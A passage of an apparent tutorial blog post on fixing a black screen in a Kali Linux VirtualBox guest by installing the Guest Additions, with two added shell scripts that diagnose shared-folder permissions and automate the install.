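# Added example: diagnose a VirtualBox shared folder that is visible but not
# writable on a Kali guest. Not from the original post.
set -eu

# in_group GROUPLIST GROUP: succeed if GROUP is one of the space-separated
# names in GROUPLIST, the format printed by `id -nG USER`.
in_group() {
    grouplist=$1 group=$2
    case " $grouplist " in
        *" $group "*) return 0 ;;
        *)            return 1 ;;
    esac
}

# vboxsf_mounts [MOUNTS_FILE]: print "SHARE MOUNTPOINT" for every mounted
# vboxsf share. Reads /proc/self/mounts unless a file is given (for tests).
vboxsf_mounts() {
    awk '$3 == "vboxsf" { print $1, $2 }' "${1:-/proc/self/mounts}"
}

# main USER: check module, mounts and group membership, with a fix for each.
main() {
    user=$1
    if grep -q '^vboxsf ' /proc/modules 2>/dev/null; then
        echo "[+] vboxsf kernel module is loaded"
    else
        echo "[-] vboxsf module not loaded: install the Guest Additions and reboot"
    fi

    mounts=$(vboxsf_mounts)
    if [ -n "$mounts" ]; then
        echo "[+] mounted shares (share mountpoint):"
        printf '%s\n' "$mounts" | sed 's/^/    /'
    else
        echo "[-] no vboxsf share is mounted: enable Auto-mount in the VM's Shared Folders settings"
    fi

    if in_group "$(id -nG "$user")" vboxsf; then
        echo "[+] $user is in the vboxsf group"
    else
        echo "[-] $user is not in vboxsf: run 'sudo adduser $user vboxsf', then log out and back in"
    fi
}

if [ "$#" -gt 0 ]; then main "$@"; fi
```

Run it as `./sf_check.sh kali`. Note that `id -nG` reports the groups recorded for the account, which is why a freshly added membership still needs a new login session before the running shell can use it.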

Fixing VirtualBox Kali Linux Black Screen

Hello friends and welcome to haxez. So, you have run into the VirtualBox Kali Linux black screen bug? After all that effort spent downloading it and importing the appliance, you’re excited, you attempt to log in and… nothing. Just a black screen. How disappointing. Do you reinstall it? Give up? Or do you fix it and add that knowledge to your mind palace?

The Cause Of The Kali Linux Black Screen

The likely cause of this problem is due to the VirtualBox Guest Additions either not being installed or not being the correct version. Either way, we need to get them installed to rule this out as a problem.

Kali Linux — Login

Grab A Shell

Start the Virtual Machine and wait for it to get to the login prompt. Before logging in, press your host key (right CTRL by default in VirtualBox) together with F2. VirtualBox delivers this to the guest as CTRL, ALT and F2, which is the combination you would press natively on Linux. This switches the operating system to a text-only virtual terminal, or TTY. To get back to the desktop environment, press the host key with the function key of the TTY the display manager is running on, usually F7 or F8.

Kali Linux — TTY Shell

Insert The Guest Additions CD

Now log in to the operating system using your credentials. If it is a Kali Virtual Machine downloaded from their website, the credentials are username: kali, password: kali (older images, before the 2020.1 release, used username: root, password: toor). Once you have logged in, instruct VirtualBox to mount the Guest Additions CD from the VirtualBox menu: Devices > Insert Guest Additions CD Image.

VirtualBox — Insert Guest Additions CD

Mount The CD-ROM

In order to access the content of the Guest Additions CD, you first need to mount it. The following command mounts the device node /dev/cdrom (normally a symlink to the optical drive, /dev/sr0) on the /media/cdrom directory. If that directory does not exist on your system, create it first.

sudo mount /dev/cdrom /media/cdrom

Now, if you list out the contents of the ‘/media/cdrom’ directory you should see a file called VBoxLinuxAdditions.run.

Mounting The CD

Install The Guest Additions

In order to install the Guest Additions you need to run that VBoxLinuxAdditions.run file. To do this simply run the following command.

sudo /media/cdrom/VBoxLinuxAdditions.run

You may be prompted to press enter; wait for the process to complete. The installer builds kernel modules, so it needs a compiler, make and the headers matching the running kernel, and it will tell you if any of these are missing. Then reboot your system with the reboot command.

sudo reboot
Installing The Guest Additions
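The mount, install and reboot steps above as one script, with the checks that usually explain a failed install, as an added example rather than the original post’s own commands. It assumes Debian/Kali package names, the /dev/cdrom and /media/cdrom paths used above, and that you pass in the host’s VirtualBox version (shown in the host’s Help > About dialog) because the guest has no way to query it; the helper names are my own.

```shell
#!/usr/bin/env bash
# Added example: install the VirtualBox Guest Additions from the inserted CD,
# skipping the work if the guest already has a matching version. Not from
# the original post.
set -eu

ISO_DEV=${ISO_DEV:-/dev/cdrom}   # device node VirtualBox attaches the ISO to
MNT=${MNT:-/media/cdrom}         # mount point used in the post

# release_of VERSIONSTRING: reduce strings such as "7.0.6 r155176" or
# "7.0.6_Debian" to the bare release number "7.0.6"; empty if none found.
release_of() {
    printf '%s\n' "$1" | sed -n 's/^\([0-9][0-9]*\(\.[0-9][0-9]*\)*\).*/\1/p'
}

# same_release A B: succeed if two version strings name the same release.
# A guest/host mismatch is one cause of the black screen, so this is the
# comparison worth making before reinstalling blindly.
same_release() {
    a=$(release_of "$1") b=$(release_of "$2")
    [ -n "$a" ] && [ "$a" = "$b" ]
}

# loaded_additions_version: version field of the installed vboxguest module,
# or an empty string if no additions are installed for this kernel.
loaded_additions_version() {
    modinfo -F version vboxguest 2>/dev/null || true
}

# installer_on MNT: path of VBoxLinuxAdditions.run on the mounted ISO; fail
# if it is missing (CD image not inserted, or something else is mounted).
installer_on() {
    inst=$1/VBoxLinuxAdditions.run
    [ -f "$inst" ] && printf '%s\n' "$inst"
}

# main HOST_VBOX_VERSION: e.g. 7.0.6, read from the host's About dialog.
main() {
    host_ver=$1
    cur=$(loaded_additions_version)
    if [ -n "$cur" ] && same_release "$cur" "$host_ver"; then
        echo "[+] Guest Additions $cur already match the host; look at the display settings instead"
        exit 0
    fi
    echo "[*] installed additions: ${cur:-none}; host is $host_ver, installing from CD"

    # The installer compiles kernel modules and fails without these.
    sudo apt-get install -y build-essential dkms "linux-headers-$(uname -r)"

    sudo mkdir -p "$MNT"
    mountpoint -q "$MNT" || sudo mount -o ro "$ISO_DEV" "$MNT"
    inst=$(installer_on "$MNT") || {
        echo "[-] VBoxLinuxAdditions.run not found on $MNT: use Devices > Insert Guest Additions CD Image first" >&2
        exit 1
    }
    sudo sh "$inst"
    sudo umount "$MNT"
    echo "[+] installed; reboot with: sudo reboot"
}

if [ "$#" -gt 0 ]; then main "$@"; fi
```

Run it as `./install_additions.sh 7.0.6` from the TTY. If the guest has network access, Kali’s own repositories also package the additions (`virtualbox-guest-x11`), which avoids the CD entirely and is updated with the rest of the system.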

Log In

Once the system has rebooted, try logging in with your username and password. Hopefully you will now be presented with your desktop and can go about your hacking activities.

Kali Linux Desktop

Other Suggestions For Kali Linux Black Screen

If for some reason that didn’t work then there are some other things you could try. One of the other common reasons for this problem is the display settings. Although changing this has never resolved the problem for me, I thought it was worth a mention. In VirtualBox, head to the settings and then the display settings. Try toggling 3D acceleration, changing the amount of video memory, and checking that the graphics controller is VMSVGA, the one VirtualBox recommends for Linux guests. I’ve heard this has resolved the issue for other people but again I’ve never been able to resolve the problem this way.

Display Settings